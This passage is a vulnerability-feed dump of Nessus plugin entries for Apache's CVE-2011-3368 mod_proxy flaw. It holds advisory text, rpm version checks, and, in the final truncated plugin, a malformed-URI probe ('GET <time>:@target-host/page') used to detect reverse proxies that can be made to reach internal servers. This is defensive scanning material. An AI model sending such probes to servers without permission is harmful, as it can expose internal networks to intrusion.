"cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T18:27:09", "description": "From Red Hat Security Advisory 2011:1392 :\n\nUpdated httpd packages that fix one security issue and one bug are now available for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting this issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update introduced regressions in the way httpd handled certain Range HTTP header values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. 
After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 4 / 5 : httpd (ELSA-2011-1392)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3368"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:httpd", "p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd-manual", "p-cpe:/a:oracle:linux:httpd-suexec", "p-cpe:/a:oracle:linux:mod_ssl", "cpe:/o:oracle:linux:4", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2011-1392.NASL", "href": "https://www.tenable.com/plugins/nessus/68377", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2011:1392 and \n# Oracle Linux Security Advisory ELSA-2011-1392 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68377);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3368\");\n script_bugtraq_id(49957);\n script_xref(name:\"RHSA\", value:\"2011:1392\");\n\n script_name(english:\"Oracle Linux 4 / 5 : httpd (ELSA-2011-1392)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2011:1392 :\n\nUpdated httpd packages that fix one security issue and one bug are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. 
A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting\nthis issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736593,\nBZ#736594)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-October/002421.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-October/002422.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4 / 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"httpd-2.0.52-49.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"httpd-devel-2.0.52-49.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"httpd-manual-2.0.52-49.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"httpd-suexec-2.0.52-49.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"mod_ssl-2.0.52-49.ent.0.1\")) flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"httpd-2.2.3-53.0.2.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-devel-2.2.3-53.0.2.el5_7.3\")) flag++;\nif 
(rpm_check(release:\"EL5\", reference:\"httpd-manual-2.2.3-53.0.2.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mod_ssl-2.2.3-53.0.2.el5_7.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-suexec / mod_ssl\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T14:58:07", "description": "Updated httpd packages that fix one security issue and one bug are now available for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting this issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update introduced regressions in the way httpd handled certain Range HTTP header values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. 
After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2011-10-21T00:00:00", "type": "nessus", "title": "RHEL 4 / 5 : httpd (RHSA-2011:1392)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3368"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-devel", "p-cpe:/a:redhat:enterprise_linux:httpd-manual", "p-cpe:/a:redhat:enterprise_linux:httpd-suexec", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2011-1392.NASL", "href": "https://www.tenable.com/plugins/nessus/56579", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1392. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56579);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3368\");\n script_bugtraq_id(49957);\n script_xref(name:\"RHSA\", value:\"2011:1392\");\n\n script_name(english:\"RHEL 4 / 5 : httpd (RHSA-2011:1392)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix one security issue and one bug are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. 
A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting\nthis issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736593,\nBZ#736594)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3368\"\n );\n # https://rhn.redhat.com/errata/RHSA-2011-1245.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1245\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1392\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:1392\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"httpd-2.0.52-49.ent\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"httpd-devel-2.0.52-49.ent\")) 
flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"httpd-manual-2.0.52-49.ent\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"httpd-suexec-2.0.52-49.ent\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"mod_ssl-2.0.52-49.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"httpd-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"httpd-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"httpd-devel-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"httpd-manual-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-manual-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"httpd-manual-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"mod_ssl-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"mod_ssl-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.3-53.el5_7.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-suexec / mod_ssl\");\n }\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T14:50:42", "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. 
In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. (CVE-2011-3368)\n\nThis update also fixes the following bug :\n\n - The fix for CVE-2011-3192 provided by a previous update introduced regressions in the way httpd handled certain Range HTTP header values. This update corrects those regressions.\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : httpd on SL4.x, SL5.x i386/x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3368"], "modified": "2021-01-14T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20111020_HTTPD_ON_SL4_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61160", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61160);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3368\");\n\n script_name(english:\"Scientific Linux Security Update : httpd on SL4.x, SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n 
attribute:\"description\", \n value:\n\"The Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nThis update also fixes the following bug :\n\n - The fix for CVE-2011-3192 provided by a previous update\n introduced regressions in the way httpd handled certain\n Range HTTP header values. This update corrects those\n regressions.\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1110&L=scientific-linux-errata&T=0&P=2404\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f8660505\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"httpd-2.0.52-49.sl4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"httpd-debuginfo-2.0.52-49.sl4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"httpd-devel-2.0.52-49.sl4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"httpd-manual-2.0.52-49.sl4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"httpd-suexec-2.0.52-49.sl4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"mod_ssl-2.0.52-49.sl4\")) flag++;\n\nif (rpm_check(release:\"SL5\", reference:\"httpd-2.2.3-53.sl5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-debuginfo-2.2.3-53.sl5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-devel-2.2.3-53.sl5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-manual-2.2.3-53.sl5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"mod_ssl-2.2.3-53.sl5.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, 
\"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-16T02:25:53", "description": "The version of Apache HTTP Server running on the remote host is affected by an information disclosure vulnerability. When configured as a reverse proxy, improper use of the RewriteRule and ProxyPassMatch directives could cause the web server to proxy requests to arbitrary hosts. This allows a remote attacker to indirectly send requests to intranet servers.", "cvss3": {"score": null, "vector": null}, "published": "2011-11-29T00:00:00", "type": "nessus", "title": "Apache HTTP Server mod_proxy Reverse Proxy Information Disclosure", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-4317"], "modified": "2018-06-27T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_MOD_PROXY_INFO_LEAK.NASL", "href": "https://www.tenable.com/plugins/nessus/56972", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(56972);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-4317\");\n script_bugtraq_id(49957, 50802);\n script_xref(name:\"EDB-ID\", value:\"17969\");\n\n script_name(english:\"Apache HTTP Server mod_proxy Reverse Proxy Information Disclosure\");\n script_summary(english:\"Make a malformed HTTP request\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The web server running on the remote host has an information\ndisclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Apache HTTP Server running on the remote host is\naffected by an information disclosure vulnerability. When configured\nas a reverse proxy, improper use of the RewriteRule and ProxyPassMatch\ndirectives could cause the web server to proxy requests to arbitrary\nhosts. 
This allows a remote attacker to indirectly send requests to\nintranet servers.\"\n );\n # http://mail-archives.apache.org/mod_mbox/httpd-announce/201110.mbox/%3C20111005141541.GA7696%40redhat.com%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7fedbcf7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://community.qualys.com/blogs/securitylabs/tags/cve-2011-4317\");\n script_set_attribute(attribute:\"see_also\", value:\"http://thread.gmane.org/gmane.comp.apache.devel/46440\");\n script_set_attribute(attribute:\"see_also\", value:\"http://httpd.apache.org/security/vulnerabilities_22.html\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade to Apache httpd 2.2.22 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/29\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\n# Make sure this looks like Apache unless paranoid\nif (report_paranoia < 2)\n{\n server = 
http_server_header(port:port);\n\n if ( 'ibm_http_server' >!< tolower(server) && 'apache' >!< tolower(server) && 'oracle http server' >!< tolower(server) && 'oracle-http-server' >!< tolower(server) )\n exit(0, 'The web server on port ' + port + ' doesn\\'t look like an Apache-based httpd.');\n\n # looks like Apache _httpd_\n if ('apache' >< tolower(server) && ( 'coyote' >< tolower(server) || 'tomcat' >< tolower(server)) )\n exit(0, 'The web server on port ' + port + ' doesn\\'t look like Apache httpd.');\n}\n\npages = make_list('/');\n\nforeach page (pages)\n{\n # GET 1324:@target-host/page\n # misconfigured servers reconstruct the URI as http://intended-host@target-host/page\n # instead of responding with an HTTP 400. this PoC should cover both CVEs\n url = strcat(unixtime(), ':@', get_host_ip(), page);\n res = http_send_recv3(method:'GET', item:url, port:port, exit_on_fail:TRUE);\n headers = parse_http_headers(status_line:res[0], headers:res[1]);\n http_code = headers['$code'];\n\n # the patched server should always send a 400. just to be on the safe side,\n # we'll explicitly check for a 200 or 404\n if (http_code == 404 || http_code == 200)\n {\n # GET 1324:@target-host:likely-closed-port/page\n # misconfigured servers reconstruct the URI as http://intended-host@target-host:likely-closed-port/page\n # instead of responding with an HTTP 400. this PoC should cover both CVEs\n url = strcat(unixtime(), ':@localhost:', 